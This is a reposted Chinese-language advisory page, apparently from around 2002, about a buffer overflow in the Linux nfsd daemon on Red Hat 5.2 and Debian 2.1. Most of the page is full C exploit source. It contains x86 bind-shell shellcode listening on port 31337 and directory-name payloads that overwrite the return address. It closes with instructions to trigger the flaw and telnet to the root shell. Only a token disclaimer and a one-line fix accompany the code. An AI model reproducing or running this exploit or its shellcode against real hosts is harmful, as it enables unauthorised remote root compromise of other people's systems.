C源码:Linux的nfsd存在溢出漏洞允许入侵者远程获取root

/ns/ld/unix/data/20020807022118.htm

转帖


C源码:Linux的nfsd存在溢出漏洞允许入侵者远程获取root



涉及程序:
Debian/Redhat Linux5.2

描述:
Linux的nfsd存在溢出漏洞允许入侵者远程获取root

详细:
如果nfsd服务为开放,并且远程用户拥有一个可写目录,则他可以远程获取root!
以下代码在Linux下编译通过,严禁用于非法用途,否则后果自负!
使用方法参看辰光工作室的 Heavy Security




#include <sys/stat.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"


char shell[255] =
"\xeb\x70\x31\xc9\x31\xdb\x31\xc0\xb0\x46\xcd\x80\x5e\x83\xc6\x0f\x89\x46"
"\x10\x89\x46\x14\x89\x46\x18\xb0\x02\x89\x06\x89\x46\x0c\xb0\x06\x89\x46"
"\x08\x31\xc0\xfe\xc3\x89\x5e\x04\xb0\x66\x89\xf1\xcd\x80\x89\x06\xb0\x30"
"\x31\xdb\x31\xc9\xb3\x0e\xfe\xc1\xcd\x80\x66\xb8\x69\x7a\x86\xc4\x66\x89"
"\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\xb0\x10\x89\x46\x08\xb0\x66\x31"
"\xdb\xb3\x02\x89\xf1\xcd\x80\x31\xc0\xfe\xc0\x89\x46\x04\xb0\x66\xb3\x04"
"\x89\xf1\xcd\x80\xeb\x04\xeb\x60\xeb\x8c\x89\x46\x0c\x8d\x46\x0c\x89\x46"
"\x04\x89\x46\x08\xc6\x46\x0c\x10\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x89\xf1"
"\xcd\x80\x83\xee\x0f\x89\xc3\x31\xc9\x89\x4e\x14\xb0\x3f\xcd\x80\x41\xb0"
"\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xfe\x06\xfe\x46\x04\x88\x66\x07\x88\x66"
"\x0b\x89\x76\x0c\x8d\x46\x09\x89\x46\x10\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
"\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\xe8\x9b\xff\xff";
char next[] = "\xff\x2e\x62\x69\x6e\x2e\x73\x68\x41\x41\x2d\x69";
char mark[] = "\xff\xff\xff";

int port = 31337;
int offset;


void usage(char *prog) {
printf("\nusage: %s <-e dir> [-t target] [-s port] "
"[-f dir] [-u user] [-p pass]\n\n",prog);
printf(" -e dir : real-path to exported direectory\n");
printf(" -t target : target OS\n ");
printf(" 1 - RH 5.2 (default) \n"
" 2 - Debian 2.1\n");
printf(" -s port : shell port, default is 31337\n");
printf(" -f dir : ftp-path to exported directory\n");
printf(" -u : ftp username (default is ftp)\n");
printf(" -p : ftp password (default is ftp@ftp.org\n\n");
exit(0);
}


void main(int argc, char **argv) {
int i,j;
int ftp=0;
char user[255]="ftp";
char pass[255]="ftp@ftp.org";
char buf[4096];
char buf2[4096];
char tmp[4096];
char tmp2[4096];
char exp[255] = "!";
char exp2[255]= "!";
char addr[] = "\x06\xf6\xff\xff\xbf";


while (1) {
i = getopt(argc,argv,"t:e:s:f:u:p:");
if (i == -1) break;
switch (i) {
case 'e': strcpy(exp,optarg); break;
case 's': port = optarg; break;
case 'f': strcpy(exp2,optarg); ftp = 1; break;
case 'u': strcpy(user,optarg); break;
case 'p': strcpy(pass,optarg); break;
case 't': switch (j=atoi(optarg)) {
case 1: strcpy(addr,"\x06\xf6\xff\xff\xbf");
break; // debian 1.2
case 2: strcpy(addr,"\x18\xf6\xff\xff\xbf");
break; // rh 5.2
}
default : usage(argv[0]); break;
}
}
if (!strcmp(exp,"!")) usage(argv[0]);
if (ftp == 1) {
// sockets, resolve, connect......
}
*((unsigned short *) (shell + 66)) = port;

offset = strlen(exp);
if (exp[offset-1] != '/') strcat(exp,"/");
offset = strlen(exp);
// 1st directory
bzero(buf,sizeof(buf));
memset(tmp,'A',255);
tmp[255]='/';
tmp[256]='\0';
strncpy(buf,exp,offset);
// make our dirs
if (ftp == 1) {
printf("USER %s\n",user);
printf("PASS %s\n",pass);
printf("CWD %s\n",exp2);
}
for (i=1;i<=3;i++) {
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck! can't create directory!!! : %d\n%s\n"normal,i,buf);
exit(-1);
}
} else {
tmp[255]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
}
// offset direcory, length depends on real-path
memset(tmp,'A',255);
tmp[255-offset]='/';
tmp[256-offset]='\0';
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
exit(-1);
}
} else {
tmp[255-offset]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
// shell directory
memset(tmp,'x',255);
// printf("%d\n", strlen(shell));
if (ftp == 1) strncat(shell,mark,strlen(mark));
// printf("%d\n", strlen(shell));
strncat(shell,next,strlen(next));
if (ftp == 1) i=3; else i=0;
strcpy(tmp+(255+i-strlen(shell)),shell);
// printf("%d\n", strlen(shell));
strncat(buf,tmp,strlen(tmp));
strncat(buf,"/",strlen("/"));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@# shell-dir\n%s\n"normal, buf);
exit(-1);
}
} else {
tmp[258]='\0';
printf("MKD %s\n",tmp);
printf("CWD %s\n",tmp);
}
// addr direcotry
memset(tmp,'a',255);
tmp[97] = '\0';
// *((int*)(tmp+93)) = addr;
// if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1
// else {
strcpy(tmp+93,addr);
// }
strncat(buf,tmp,strlen(tmp));
if (ftp != 1) {
if (mkdir(buf,0777) < 0) {
printf(red"...fuck!@#!@#!$ addrez-dir ^\n%s\n"normal, buf);
exit(-1);
}
} else {
printf("MKD %s\n",tmp);
printf("quit\n",tmp);
}
fprintf(stderr,normal green"Ok\n"normal);
fprintf(stderr,"now you have to do: "bold green "rm -rf /path-to-mount-point/A[tab] & \n"
"and: telnet target %d\n\n"normal,port);
}



解决方案:
关闭可写目录,或者干脆关闭nfsd的守护进程